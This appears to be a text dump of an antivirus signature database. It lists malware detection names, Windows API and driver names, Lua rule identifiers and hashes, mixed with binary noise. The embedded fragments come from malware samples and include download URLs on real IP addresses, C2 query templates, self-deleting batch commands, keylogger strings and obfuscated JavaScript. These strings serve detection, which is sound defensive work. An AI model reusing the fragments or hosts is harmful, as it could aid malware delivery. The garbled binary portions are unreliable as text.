aceWSECUR32.InitSecurityInterfaceWInitializeSecurityContextASECUR32.InitializeSecurityContextALsaCallAuthenticationPackageSECUR32.LsaCallAuthenticationPackageLsaConnectUntrustedSECUR32.LsaConnectUntrustedLsaDeregisterLogonProcessSECUR32.LsaDeregisterLogonProcessLsaEnumerateLogonSessionsSECUR32.LsaEnumerateLogonSessionsLsaFreeReturnBufferSECUR32.LsaFreeReturnBufferLsaGetLogonSessionDataSECUR32.LsaGetLogonSessionDataLsaLogonUserSECUR32.LsaLogonUserLsaLookupAuthenticationPackageSECUR32.LsaLookupAuthenticationPackageLsaRegisterLogonProcessSECUR32.LsaRegisterLogonProcessLsaRegisterPolicyChangeNotificationSECUR32.LsaRegisterPolicyChangeNotificationLsaUnregisterPolicyChangeNotificationSECUR32.LsaUnregisterPolicyChangeNotificationMakeSignatureSECUR32.MakeSignatureQueryContextAttributesASECUR32.QueryContextAttributesAQueryContextAttributesWSECUR32.QueryContextAttributesWQueryCredentialsAttributesASECUR32.QueryCredentialsAttributesAQueryCredentialsAttributesWSECUR32.QueryCredentialsAttributesWQuerySecurityContextTokenSECUR32.QuerySecurityContextTokenQuerySecurityPackageInfoASECUR32.QuerySecurityPackageInfoARevertSecurityContextSECUR32.RevertSecurityContextSaslAcceptSecurityContextSECUR32.SaslAcceptSecurityContextSaslEnumerateProfilesASECUR32.SaslEnumerateProfilesASaslEnumerateProfilesWSECUR32.SaslEnumerateProfilesWSaslGetProfilePackageASECUR32.SaslGetProfilePackageASaslGetProfilePackageWSECUR32.SaslGetProfilePackageWSaslIdentifyPackageASECUR32.SaslIdentifyPackageASaslIdentifyPackageWSECUR32.SaslIdentifyPackageWSaslInitializeSecurityContextASECUR32.SaslInitializeSecurityContextASaslInitializeSecurityContextWSECUR32.SaslInitializeSecurityContextWSetContextAttributesASECUR32.SetContextAttributesASetContextAttributesWSECUR32.SetContextAttributesWTranslateNameASECUR32.TranslateNameATranslateNameWSECUR32.TranslateNameWVerifySignatureSECUR32.VerifySignatureRSDSt security.pdb security.pdby $ totaldr= !Sirefef.R !Slenfbot.AKU !Agent.YO !Agent.YM !Agent.YN !Slenfbot.AKW !Karagany.G @ $0\t]5 .0%fH /showthread.php?t= E-zHo !Small.AABP SoftwareBundler:Win32/LiveAgentUvi \"SoftwareBundler:Win32/LiveAgentUvi !Dofoil.gen!B A070] !Vundo.OT !Sirefef.A $0L0.0 !Sirefef.B TrojanDownloader:ASX/Wimad.DD __asf_license_url_rpf_generated__http://plugin-installer.com/ ?__asf_license_url_rpf_generated__http://plugin-installer.com/ !Slenfbot.AKX !Sefnit.AA !Vundo.OU Trojan:Win64/Alureon.D uac64ok !Agent.DB Trojan:Win64/Alureon.E Trojan:Win64/Alureon.F !Vundo.OV sacuure.dll acClient sacuure.dllacClient !Dorkbot.V !Sirefef.S GET /p/task2.php?w=%u&i=%S&n=%u %wZ\\Software\\%08x !Dorkbot.W Rogue:JS/Simda varzc9rvxylxeoojll1c1rphn1v5vs=\"104112\";eval( /varzc9rvxylxeoojll1c1rphn1v5vs=\"104112\";eval( varzc9rv2088an96cd5k85wu9eztu2ncj6cs=\"51012\";eval( 4varzc9rv2088an96cd5k85wu9eztu2ncj6cs=\"51012\";eval( ;)\";varzc9rvyyzm76b83bvfa7rfd26hwd=\"93238\";tyiegj1o23d45u89hokzs( a-z0-9);varzc9rvyyzm76b83bvfa7rfd26hws=\"93233\";eval(ww34k6pe6cm15);varzc9rvyyzm76b83bvfa7rfd26hwd=\"93238\"; SettingsModifier:Win32/QHosts.B TrojanDownloader:ASX/Wimad.DE __asf_license_url_rpf_generated__http://plugin-installer.info/ @__asf_license_url_rpf_generated__http://plugin-installer.info/ TrojanDownloader:ASX/Wimad.DH __asf_license_url_rpf_generated__http://installer.mediapassplugin.com/ H__asf_license_url_rpf_generated__http://installer.mediapassplugin.com/ TrojanDownloader:ASX/Wimad.DI __asf_license_url_rpf_generated__http://playsong.mediasongplayer.com/ G__asf_license_url_rpf_generated__http://playsong.mediasongplayer.com/ TrojanDownloader:ASX/Wimad.DJ __asf_license_url_rpf_generated__http://play.videosongplayer.com/ C__asf_license_url_rpf_generated__http://play.videosongplayer.com/ TrojanDownloader:ASX/Wimad.DK __asf_license_url_rpf_generated__http://setup-mediaplayer.info/ A__asf_license_url_rpf_generated__http://setup-mediaplayer.info/ TrojanDownloader:ASX/Wimad.DL __asf_license_url_rpf_generated__http://video-song-player-install-now.com/ L__asf_license_url_rpf_generated__http://video-song-player-install-now.com/ !Karagany.H .php?f=%i&t= &sid=%s !Sirefef.T Misleading:Win32/WinMaximizer Misleading:Win32/WinMaximizerQ@ &g@M~J/ cAie[ r+Tc$ G Fo) tw\tnoO`` c-0|T :xjhg \\winmaximizer` &\\winmaximizer` \\programs\\winmaximizer` \\winmaximizer\\languages] &\\winmaximizer\\languages] aAlureon.AA BKFSS [injects_end] [injects_end]xk $systemstartoptions %s\\ph.dll !Small.AIK SettingsModifier:Win32/QHosts.C !Killav.FT !Pushbot.VG !Agent.YQ !Sirefef.V |POST /ajax/chat/send.php? coolcore SkinuxWindow SkinuxWindow~ rfq*J 1U+G<6 vvm@; 7 F:ZR 7 F:ZR j,oR< G /@/ _n)w; SkinuxWindow] !Agent.YR !Dorkbot.X SoftwareBundler:Win32/SoftAdvisor !SoftwareBundler:Win32/SoftAdvisor softadvisor.org/player_offer.php Powered by InstallQuark \\Player.exe \\Install\\RP.exe \\Install\\RP.exe] !Vundo.OW Rogue:HTML/FakeAlert $.getjson(\"http://94.23.39.156/fakeav/files.php?jsoncallback=?\",function(data){$.each(data,function(e) h$.getjson(\"http://94.23.39.156/fakeav/files.php?jsoncallback=?\",function(data){$.each(data,function(e) !Dorkbot.Y !Alureon.gen!AE $ _B>0 !Sirefef.W Trojan:Win64/Alureon.gen!G 9MZu HcA< PEt\tH Trojan:Win64/Alureon.gen!H [injects_begin_64] MARKER_AFFID MARKER_SUBID MARKER_AFFIDMARKER_SUBID :MZu HcB< Trojan:Win64/Alureon.gen!I ;BKFSt !Vundo.OX !Sefnit.AB !Dorkbot.Z MonitoringTool:Win32/Keylogger @ [SHIFT] [CONTROL] LOG.txt logSystem.txt log.dic !Fareit.C 1n[G# 1n[G#b !Sefnit.AG !Sefnit.AF !Sefnit.AC !Sefnit.AD !Sefnit.AE H0&&; !Agent.YS !Killav.AAB !Agent.YT !Sirefef.X Killav.BC TrojanDownloader:ASX/Wimad.DM __asf_script_command_rpf_generated__urlandexithttp://mytube.hs.vc/ D__asf_script_command_rpf_generated__urlandexithttp://mytube.hs.vc/ !Agent.YU !Agent.YV Rogue:Win32/Naparb 1Why can`t I remove the viruses detects? Trojan.Hooblong.A CYour computer is compromised by hackers, adware, malware and worms! 3has detected some serious threats to your computer! \"one of the best antiviruses today? \"one of the best antiviruses today?] !Waledac.O \\wQJs !Sefnit.AI Global\\VBoxService.exe \\output\\MinSizeRel\\updrem.pdb \\output\\MinSizeRel\\updrem.pdb] !Sefnit.AJ FlashPlayerControl_%s_%d !Dofoil.gen!C hrkhWo !Sefnit.AH !PornDialer.A !Agent.YW !Agent.ABHT !Small.AIL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Lua:TopLevelSingleFileCAB Lua:TopLevelDoubleFileCAB Lua:PossibleTechsnabCAB [CABDATA] 3189ccd9ba7a REG_ESI 368914014e83 REG_EDI 428952f70cb7 !#LuaZipWithSingleFile !#LuaZipWithSingleFileObMpAttributes diagcab //LuaZipWithSingleJS .diagcab \t.diagcab //LuaZipWithSingleDiagCab //LuaZipLT4kbWithSingleFile !#SLF:Lua:PSDownloader !#SLF:Lua:PSDownloaderIncludesTechniqueTrackerObMpAttributes amazon-ssm-agent.exe|waworkerhost.exe|gcemetadatascripts.exe|ruby.exe|ssm-document-worker.exe|glyph.publisher.exe|ssm-agent-worker.exe|screenconnect.clientservice.exe|cfn-init.exe|winhup.exe|cloudtestagent.exe|microsoft.management.services.intunewindowsagent.exe|azcopy.exe|agentexecutor.exe|gitlab-runner.exe|scriptrunner.exe|cagservice.exe|ltsvc.exe|jumpcloud-agent-updater.exe| cyserver.exe|aemagent.exe|pangphip.exe 'cyserver.exe|aemagent.exe|pangphip.exe appveyor.yml|cscompmeta|resume_db.json|metadata_db.json 8appveyor.yml|cscompmeta|resume_db.json|metadata_db.json ingress_tool !#ALF:Lua:ContextualGamDll6 ^%l%l%l%l%l%l%l%l%l%l+%.%l%l%l$ ^%l%l%l%l%l%l%l%l%l%l+%.%l%l%l$ ^~%$%l%l%l%l%l+%.%l%l%l$ ^%w+%.%w+%.%w+%.%w+%.%w+%.%w+%.%w+%.%w+$ )^%w+%.%w+%.%w+%.%w+%.%w+%.%w+%.%w+%.%w+$ ^%w%w%w%w%w+_? ?%w-%.%w%w%w%w%w+$ \"^%w%w%w%w%w+_? ?%w-%.%w%w%w%w%w+$ !#Worm:Win32/Dorkbot!ctx !#Worm:Win32/Dorkbot!ctxObMpAttributes Detection:Trojan:Win32/Bagsu!rfn !Detection:Trojan:Win32/Bagsu!rfn Detection:Trojan:Win32/Bulta!rfn !Detection:Trojan:Win32/Bulta!rfn Detection:VirTool:Win32/Obfuscator.AMM 'Detection:VirTool:Win32/Obfuscator.AMM Detection:Trojan:Win32/Toga!rfn Detection:Trojan:Win32/Toga!rfn RDTSC_Anti HSTR:CheckSavedErrorCode Lua:SuspiciousSectionName attrmatch_codepatch_ PEBMPAT:AutoSig PEEMU:AutoSig HSTR:AutoSig SIGATTR:VirTool:Win32/Obfuscator.AKE %SIGATTR:VirTool:Win32/Obfuscator.AKE HSTR:Win32/Obfuscator.NGR HSTR:Win32/Obfuscator.NGR2 LowFi:Win32/MalDecoder !#Lua:EncryptedZip senha Lua:PossibleFourthremZIP Lua:IOAVZIPSingleEncryptedEXE 2e95715703d1 junkstarted thisisjunk edb3854dc4bf sqlite.dll !#/Lua:Worm:JS/Bondat.A!lnk SCRIPT:Worm:JS/Bondat.A!lnk \\appdata\\roaming\\%w+\\(%w+%.exe)%z \"\\appdata\\roaming\\%w+\\(%w+%.exe)%z windows explorer%.lnk 1c8983bf8241 2695c27f9f93 2695e61a445f 2729e06cbac8 27897924cfbc 2a78601326dc 2f7811195fc6 PUA:Block:SmartInstaller 4178edb8aa83 PUA:Block:IStartSurf:Bit 476185b5a169 App:CoinMiner64:lolMiner 632918e6b32e 81419ea68f89 PUA:Block:InstallCapital 86784bb6fb74 PUA:Block:ProtectionLive 954068f1fbf7 PUA:Block:OfferInstaller af78dd25e039 PUA:Block:Carbmorner:Bit cb78eec25473 80678bd9649cb PUA:Block:InstMonetizer 119595a5a5e9 15408d99d3bd 17951a9f5278 1b9538229c23 2878ab2b7808 2878dba7a416 2b783c53e0fd 2c4122268940 2f2946837619 3041557b8630 308946779ea6 3178ef94d1ee 3278d31f1e4d 3540076d6263 3540095fefbd 35401c570899 35401f06550a 354024a9a236 35402aadba13 35404dc9c359 3540a87923ad 3540accd6ae5 3540b31acf61 3540d61695c1 3540dd1ad270 3540df0e4e4a 3540e5faed9d 3540edf6fe42 3540f0673983 3540f695128e 3578742f74ff 358970d924ca 3678b6b20892 37897322a6ae 3941accb5b82 3941e804789f 3978dce00655 3a41010dc0e2 3b787813f837 3b78da0d0112 3b9599fbad8f 3e417dcd175b 3e7873fbd0da 3f41990eddfe 3f781ec9dab3 4178bc60bbd6 4278ab1a6265 4289397db4e4 437878fa7961 4378a2d2b0cb 44894441821c 45400d7a19da 4540182f1382 454059ba53ad 4540b43136d4 4540db6cf928 4540de7de3ea 45784e7e3c0e 45891380c56a 4878bb21bf8a 49788660395b 4978be87b1d7 49891ce96f05 4989daa662bd 4a788fbdca7a 4a95f71b5110 PEBMPAT:Disable_API_Limit 4b7812319e00 4b89b6be888d 4e780e8ef21f 5061d85e27bf 5078e4289364 52784cb527c6 5378b0550be9 5478efb61507 !Ldpinch.UA !Killav.A !Busky!dll 1Busky !Busky.gen!dll !Zlob.AJI !Zlob.AJK !Zlob.AJL !Zlob.AJM !Zlob.AJN !Zlob.AJO !Zlob.AJP !Zlob.AJQ !Zlob.AJJ !Zlob.AJR !Zlob.AJS !Agent.WM !Harnig 5Agent.U !Agent.U !Agent.BBX Kaboom.3_0 Typhoon !Ldpinch.VA !Killav.KA !Inservice.Z !Tibs.gen!B tibsloader %s/%s?v=%s&act=% &aid=%s&skid=%s %s:%04d%02d%02d% c=%s&cid=%d TIBS%s *cgi-bin/%s?prog=ldr&ver=%s&code=%d&info=%s *cgi-bin/%s?prog=ldr&ver=%s&code=%d&info=%s] !Robis.A !Vxidl vOXc3 !Harnig.gen!A %s?c=%d %s?c=%d%s%s %s%s&id=%d&c=%d %s%s%s %s%s&id=%d&c=%d%u%s%s%s%s?c 0explorer.exe IsProcessorFeatu 0explorer.exekernel32.dllIsProcessorFeatu] !Harnig.gen!B \t.php=adv > nul > nul/c del newl1 COMSPECnewl1 http://%s/progs/%s/ .exe%dC:\\ .exe\\ wininet.dllOpen hpadv &code2= &code1= .php?adv= \t.php?adv= GetSystemDefaultLangID] !Small.CCT !Small.CCU !Alureon.A !Wintrim.gen!A WAOL.EXE EGDHTML Opening the port... Registering your computer on the network... +Registering your computer on the network... All Internet Explorer have been closed. 'All Internet Explorer have been closed. rundll32.exe EGDACCESS.dll XORFile2File : XORFile2File : ] !Agent.EU !Small.UA !Small.UE !Small.ER !Adload.AM !Adload.AN !Adload.AO !Adload.AP !Small.ES !Small.FA !Agent.FB !Small.FC !Agent.V !Agent.AR 08m.P !Agent.AV X(1BP] !Agent.AX !Agent.BB !Agent.EV !Agent.FF !Agent.FG !Agent.FH !Agent.FI !Agent.FN !Agent.FO !Agent.FP !Agent.FQ !Agent.FR !Adload.AQ !Adload.AR v@:>g !Small.FH !Small.BKS !Killav.ET !Zlob.ZVX !Lowzones.gen!A 0C>u# !Small.FJ !Ldpinch.UB !Harnig.BX !VBStat.D !Ldpinch.UC !Sobit.H !Alureon.F L\\;/G !Alureon.G !Harnig.EC !Harnig.ED !Renos.CA 5Vundo.F !Renos.gen!dll !Agent.WO &a=1 HTTP/1.1 GET /dl?w= Host: 66 User-Agent: 66.117.37.7 /autodetect.exe GetTempPathA] !Agent.WP shell_traywnd %s\\C:\\WINDOWS\\Sy shell_traywnd%s\\C:\\WINDOWS\\Sy http://w GGPPopenFFhttp://w !Agent.WQ \t\\regcheck /spambot /spambot] !Alureon.gen!B PEGFSDGHXCBGTR# KEBDHORDCZGLTA# EEGSDHSFGJL GHXCBGTR ORDCZGLTA \tORDCZGLTA /cnt.jpg Content-Type: %s;%s;%x;%x;%x %s\\%c%c%c%c%c.%s sidcls )Software\\Microsoft\\Windows\\CurrentVersion http://85 \thttp://85 Microsoft Internet Explorer CreateEventA VirtualProtectEx RemoveDirectoryA InternetCanonicalizeUrlA InternetConnectA] !Agent.WS del %1 if exist %1 goto l a.bat file.php?&ID=%s&EXE= Shell DocObject View Internet Explorer_Server] 1Inservice dalexcars.com GET /intercooler Host: www. 'User-Agent: Mozilla/4.0 (compatible; 1- /users/mulez/ %s\\%s%d.exe intercooler \tinet_addr strtok strtok] !Agent.WR !Agent.WU http://max-stats.com http://sc-cash.com www.teen4-sex.com C:\\WINDOWS\\SYSTEM32\\pref c2.php?i= \tc2.php?i= winlogon32. winlogon32.] !Agent.WV http://yupsearch.com /silent_install.exe /sideb.exe \\%ld%d.exe InjectorLoaderMMF WM_HOOKSPY_RK HookProc DownloadRemote !Agent.WW http://toolbarpartner.com /installed.php?wm= /programs.txt http://sturfajtn.com /w.php /load.txt \t/load.txt %WINDIR%\\System32\\$$$ regsvr32 /s %SystemRoot%\\sys %i%i.dll %i%i.exe Explorer.exe %WINDIR%\\System32\\ !Harnig.gen!C http://213. /dladv .php?code1= dluniq .txt\\ tool.exe tool.txt tibs.php tibs.exe InternetOpen !Agent.AYY !Agent.WX Title Windows Update @del %1 >nul @if exist %1 goto d @del %0a.bat C:\\myapp.exe GetModuleFileNameA !Small.gen!D !Small.gen!E !Agent.WY DebugActiveProcess VirtualAlloc] !Small.gen!F !Promon !Zlob.ZWA !Agent.WZ !Harnig.H !Harnig.I !Harnig.gen!D paydial.txt \\paydial.exe paytime.txt \\paytime.exe \\countrydial.exe \\tibs.exe \\dimak \\uniq\\kl.exe\\ adv=adv &code1=HNNE&code2=5121 http://195.95.218.173/dl/dl.php? http://195.95.218.173/troys/ newdial1.txt \\newdial1.exe newdial.txt dl/dluniq.php? \\secure32.html toolbar.txt \\toolbar.exe degbes.txt \\degbes.exe kl.txt \\kl.exe !Harnig.gen!F \\tsasxc.exe \\iybkege.exe \\xjkjtea.exe \\dmfxyqt.exe \\ocqhb.exe \\ewfqb.exe \\avirx.exe \\odmcsk.exe 5Agent.WZ ORIGAMI ?self= &type= &key= runned TND1http://85.255.119 SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\origami DSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\origami BCBC@A !Agent.XA ##ws2_32.dll ##%d.exe Downloader: fetch OK, %d Downloader: can't open file: %d @@svchost.exe ##http://64.27.0.205 216.255.189.85 w:\\work\\vcprj\\prj\\downloader\\Release\\injdldr.pdb 0w:\\work\\vcprj\\prj\\downloader\\Release\\injdldr.pdb http://64.27.0.205/up/calc2.bin %s\\t%d.exe RSDSk BC5E6DA8-DD1B-12DD-139A-B5B2378C9A04 $BC5E6DA8-DD1B-12DD-139A-B5B2378C9A04 3645FBCD-ECD2-23D0-BAC4-00DE453DEF6B $3645FBCD-ECD2-23D0-BAC4-00DE453DEF6B NSAPI.dll \tNSAPI.dll B h(((( H PVVQV PVVQV D$HDf TrojanDownloader:HTML/Renos content=\"0;url=http://95.64.47.164/ /content=\"0;url=http://95.64.47.164/ \\SystemRoot\\system32\\DRIVERS\\bowser.sys \\SystemRoot\\System32\\drivers\\mpsdrv.sys \\SystemRoot\\system32\\drivers\\mrxdav.sys \\SystemRoot\\system32\\DRIVERS\\mrxsmb.sys \\SystemRoot\\system32\\DRIVERS\\mrxsmb.sys @ \\SystemRoot\\system32\\DRIVERS\\mrxsmb10.sys \\SystemRoot\\system32\\DRIVERS\\mrxsmb20.sys \\SystemRoot\\system32\\DRIVERS\\mrxsmb20.sys0E \\SystemRoot\\system32\\DRIVERS\\asyncmac.sys \\SystemRoot\\system32\\DRIVERS\\asyncmac.sys@G \\SystemRoot\\System32\\Drivers\\PGPdisk.SYS \\SystemRoot\\system32\\DRIVERS\\PROCDD.SYS \\SystemRoot\\system32\\DRIVERS\\mdmxsdk.sys \\SystemRoot\\system32\\DRIVERS\\mdmxsdk.sysPL \\SystemRoot\\system32\\drivers\\peauth.sys \\SystemRoot\\system32\\drivers\\peauth.sys0Z \\SystemRoot\\System32\\Drivers\\PGPsdk.sys \\SystemRoot\\System32\\Drivers\\secdrv.SYS \\SystemRoot\\System32\\DRIVERS\\srvnet.sys \\SystemRoot\\System32\\DRIVERS\\srvnet.sys`] \\SystemRoot\\System32\\drivers\\tcpipreg.sys \\SystemRoot\\System32\\drivers\\tcpipreg.sys ^ \\SystemRoot\\system32\\DRIVERS\\xaudio.sys \\SystemRoot\\system32\\DRIVERS\\xaudio.sys` \\SystemRoot\\System32\\DRIVERS\\srv2.sys \\SystemRoot\\System32\\DRIVERS\\srv.sys \\SystemRoot\\system32\\DRIVERS\\cdfs.sys \\??\\C:\\Windows\\system32\\CCM\\prepdrv.sys \\??\\C:\\Windows\\system32\\CCM\\prepdrv.sys@ \\SystemRoot\\System32\\Drivers\\LenovoRd.sys \\SystemRoot\\System32\\Drivers\\tcusb.sys \\SystemRoot\\System32\\Drivers\\tcusb.sysMwp \\Windows\\System32\\ntdll.dll BUGCHECK! NTOSKRNL.EXE 0123456789ABCDEF \\Windows\\System32\\ntdll.dllBUGCHECK!HAL.DLLNTOSKRNL.EXEDRIVERNAMESTRING0123456789ABCDEF{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x} hal.dll Systemntoskrnl.exehalMpDriver.sys\\??\\C:\\WINDOWS\\SYSTEM32\\DRIVERS\\MpDriver.syshal.dll\\WINDOWS\\system32\\hal.dllhal.dllntoskrnl.exe\\WINDOWS\\system32\\ntoskrnl.exe \\Registry\\Machine\\Hardware\\MpDriverMpDriver\\Registry\\Machine\\System\\CurrentControlSet\\Services\\MpDriverC:\\WINDOWS (null)(null) RSDS4 6X~[| ntoskrnl.pdb ntoskrnl.pdbBs YY_^[ t%It\" u$QWQ FFBB BBFFf AABBf GGBBf SVWt* 8SVWt* jA^f; ja^f; >_^[] } j-Xf 1AA9U !#HSTR:JAVA:Feature:C:68 !#HSTR:JAVA:Feature:C:70 !#HSTR:JAVA:Feature:C:74 !#HSTR:JAVA:Feature:C:77 !#HSTR:JAVA:Feature:C:79 !#HSTR:JAVA:Feature:C:80 !#HSTR:JAVA:Feature:C:82 !#HSTR:JAVA:Feature:C:84 !#HSTR:JAVA:Feature:C:85 !#HSTR:JAVA:Feature:C:90 !#HSTR:JAVA:Feature:C:92 !#HSTR:JAVA:Feature:C:95 !#HSTR:JAVA:Feature:C:96 !#HSTR:JAVA:Feature:M:10 !#HSTR:JAVA:Feature:M:11 !#HSTR:JAVA:Feature:M:14 !#HSTR:JAVA:Feature:M:17 !#HSTR:JAVA:Feature:M:18 !#HSTR:JAVA:Feature:M:20 !#HSTR:JAVA:Feature:M:21 !#HSTR:JAVA:Feature:M:27 !#HSTR:JAVA:Feature:M:28 !#HSTR:JAVA:Feature:M:31 !#HSTR:JAVA:Feature:M:32 !#HSTR:JAVA:Feature:M:33 !#HSTR:JAVA:Feature:M:35 !#HSTR:JAVA:Feature:M:37 !#HSTR:JAVA:Feature:M:39 !#HSTR:JAVA:Feature:M:40 !#HSTR:JAVA:Feature:M:41 !#HSTR:JAVA:Feature:M:43 !#HSTR:JAVA:Feature:M:44 !#HSTR:JAVA:Feature:M:45 !#HSTR:JAVA:Feature:M:46 !#HSTR:JAVA:Feature:M:47 !#HSTR:JAVA:Feature:M:48 !#HSTR:JAVA:Feature:M:50 !#HSTR:JAVA:Feature:M:51 !#HSTR:JAVA:Feature:M:52 !#HSTR:JAVA:Feature:M:53 !#HSTR:JAVA:Feature:M:54 !#HSTR:JAVA:Feature:M:56 !#HSTR:JAVA:Feature:M:57 !#HSTR:JAVA:Feature:M:69 !#HSTR:JAVA:Feature:M:71 !#HSTR:JAVA:Feature:M:72 !#HSTR:JAVA:Feature:M:73 !#HSTR:JAVA:Feature:M:75 !#HSTR:JAVA:Feature:M:76 !#HSTR:JAVA:Feature:M:78 !#HSTR:JAVA:Feature:M:81 !#HSTR:JAVA:Feature:M:83 !#HSTR:JAVA:Feature:M:86 !#HSTR:JAVA:Feature:M:87 !#HSTR:JAVA:Feature:M:88 !#HSTR:JAVA:Feature:M:89 !#HSTR:JAVA:Feature:M:91 !#HSTR:JAVA:Feature:M:93 !#HSTR:JAVA:Feature:M:94 !#HSTR:JAVA:Feature:M:97 !#HSTR:JAVA:Feature:M:98 !#HSTR:JAVA:Feature:M:99 !#HSTR:JAVA:Feature:C:105 !#HSTR:JAVA:Feature:C:107 !#HSTR:JAVA:Feature:C:114 !#HSTR:JAVA:Feature:C:115 !#HSTR:JAVA:Feature:C:118 !#HSTR:JAVA:Feature:C:119 !#HSTR:JAVA:Feature:C:126 !#HSTR:JAVA:Feature:C:128 !#HSTR:JAVA:Feature:C:129 !#HSTR:JAVA:Feature:C:130 !#HSTR:JAVA:Feature:C:131 !#HSTR:JAVA:Feature:C:132 !#HSTR:JAVA:Feature:C:133 !#HSTR:JAVA:Feature:C:134 !#HSTR:JAVA:Feature:C:135 !#HSTR:JAVA:Feature:C:136 !#HSTR:JAVA:Feature:C:138 !#HSTR:JAVA:Feature:C:140 !#HSTR:JAVA:Feature:C:141 !#HSTR:JAVA:Feature:C:144 !#HSTR:JAVA:Feature:C:145 !#HSTR:JAVA:Feature:C:146 !#HSTR:JAVA:Feature:C:149 !#HSTR:JAVA:Feature:C:151 !#HSTR:JAVA:Feature:C:153 !#HSTR:JAVA:Feature:C:154 !#HSTR:JAVA:Feature:C:156 !#HSTR:JAVA:Feature:C:161 !#HSTR:JAVA:Feature:C:162 !#HSTR:JAVA:Feature:C:163 !#HSTR:JAVA:Feature:C:164 !#HSTR:JAVA:Feature:C:165 !#HSTR:JAVA:Feature:C:166 !#HSTR:JAVA:Feature:C:167 !#HSTR:JAVA:Feature:C:171 !#HSTR:JAVA:Feature:C:172 !#HSTR:JAVA:Feature:C:175 !#HSTR:JAVA:Feature:C:179 !#HSTR:JAVA:Feature:C:180 !#HSTR:JAVA:Feature:C:181 !#HSTR:JAVA:Feature:C:183 !#HSTR:JAVA:Feature:C:187 !#HSTR:JAVA:Feature:C:190 !#HSTR:JAVA:Feature:C:193 !#HSTR:JAVA:Feature:C:195 !#HSTR:JAVA:Feature:C:197 !#HSTR:JAVA:Feature:C:200 !#HSTR:JAVA:Feature:C:203 !#HSTR:JAVA:Feature:C:204 !#HSTR:JAVA:Feature:C:208 !#HSTR:JAVA:Feature:C:214 !#HSTR:JAVA:Feature:C:215 !#HSTR:JAVA:Feature:C:216 !#HSTR:JAVA:Feature:C:217 !#HSTR:JAVA:Feature:C:221 !#HSTR:JAVA:Feature:C:224 !#HSTR:JAVA:Feature:C:225 !#HSTR:JAVA:Feature:C:226 !#HSTR:JAVA:Feature:C:227 !#HSTR:JAVA:Feature:C:228 !#HSTR:JAVA:Feature:C:234 !#HSTR:JAVA:Feature:C:235 !#HSTR:JAVA:Feature:C:236 !#HSTR:JAVA:Feature:C:237 !#HSTR:JAVA:Feature:C:239 !#HSTR:JAVA:Feature:C:240 !#HSTR:JAVA:Feature:C:241 !#HSTR:JAVA:Feature:C:242 !#HSTR:JAVA:Feature:C:244 !#HSTR:JAVA:Feature:C:245 !#HSTR:JAVA:Feature:C:247 !#HSTR:JAVA:Feature:C:248 !#HSTR:JAVA:Feature:C:251 !#HSTR:JAVA:Feature:C:252 !#HSTR:JAVA:Feature:C:256 !#HSTR:JAVA:Feature:C:257 !#HSTR:JAVA:Feature:C:258 !#HSTR:JAVA:Feature:C:259 !#HSTR:JAVA:Feature:C:262 !#HSTR:JAVA:Feature:C:263 !#HSTR:JAVA:Feature:C:266 !#HSTR:JAVA:Feature:C:268 !#HSTR:JAVA:Feature:C:269 !#HSTR:JAVA:Feature:C:274 !#HSTR:JAVA:Feature:C:276 !#HSTR:JAVA:Feature:C:279 !#HSTR:JAVA:Feature:C:283 !#HSTR:JAVA:Feature:C:284 !#HSTR:JAVA:Feature:C:285 !#HSTR:JAVA:Feature:C:286 !#HSTR:JAVA:Feature:C:289 !#HSTR:JAVA:Feature:C:291 !#HSTR:JAVA:Feature:C:293 !#HSTR:JAVA:Feature:C:295 !#HSTR:JAVA:Feature:C:296 !#HSTR:JAVA:Feature:C:297 !#HSTR:JAVA:Feature:C:301 !#HSTR:JAVA:Feature:C:303 !#HSTR:JAVA:Feature:C:305 !#HSTR:JAVA:Feature:C:306 !#HSTR:JAVA:Feature:C:307 !#HSTR:JAVA:Feature:C:309 !#HSTR:JAVA:Feature:C:310 !#HSTR:JAVA:Feature:C:312 !#HSTR:JAVA:Feature:C:316 !#HSTR:JAVA:Feature:C:319 !#HSTR:JAVA:Feature:C:329 !#HSTR:JAVA:Feature:C:330 !#HSTR:JAVA:Feature:C:331 !#HSTR:JAVA:Feature:C:334 !#HSTR:JAVA:Feature:C:335 !#HSTR:JAVA:Feature:C:337 !#HSTR:JAVA:Feature:C:338 !#HSTR:JAVA:Feature:C:340 !#HSTR:JAVA:Feature:C:342 !#HSTR:JAVA:Feature:C:345 !#HSTR:JAVA:Feature:C:351 !#HSTR:JAVA:Feature:C:354 !#HSTR:JAVA:Feature:C:356 !#HSTR:JAVA:Feature:C:360 !#HSTR:JAVA:Feature:C:361 !#HSTR:JAVA:Feature:C:362 !#HSTR:JAVA:Feature:C:366 !#HSTR:JAVA:Feature:C:367 !#HSTR:JAVA:Feature:C:369 !#HSTR:JAVA:Feature:C:370 !#HSTR:JAVA:Feature:C:373 !#HSTR:JAVA:Feature:C:375 !#HSTR:JAVA:Feature:C:376 !#HSTR:JAVA:Feature:C:378 !#HSTR:JAVA:Feature:C:379 !#HSTR:JAVA:Feature:C:380 !#HSTR:JAVA:Feature:C:386 !#HSTR:JAVA:Feature:C:388 !#HSTR:JAVA:Feature:C:389 !#HSTR:JAVA:Feature:C:390 !#HSTR:JAVA:Feature:C:392 !#HSTR:JAVA:Feature:C:395 !#HSTR:JAVA:Feature:C:396 !#HSTR:JAVA:Feature:C:397 !#HSTR:JAVA:Feature:C:398 !#HSTR:JAVA:Feature:C:400 !#HSTR:JAVA:Feature:C:401 !#HSTR:JAVA:Feature:C:404 !#HSTR:JAVA:Feature:C:407 !#HSTR:JAVA:Feature:C:409 !#HSTR:JAVA:Feature:C:410 !#HSTR:JAVA:Feature:C:416 !#HSTR:JAVA:Feature:C:418 !#HSTR:JAVA:Feature:C:419 !#HSTR:JAVA:Feature:C:421 !#HSTR:JAVA:Feature:C:426 !#HSTR:JAVA:Feature:C:427 !#HSTR:JAVA:Feature:C:429 !#HSTR:JAVA:Feature:C:434 !#HSTR:JAVA:Feature:C:435 !#HSTR:JAVA:Feature:C:437 !#HSTR:JAVA:Feature:C:438 !#HSTR:JAVA:Feature:C:443 !#HSTR:JAVA:Feature:C:444 !#HSTR:JAVA:Feature:C:446 !#HSTR:JAVA:Feature:C:447 !#HSTR:JAVA:Feature:C:452 !#HSTR:JAVA:Feature:C:457 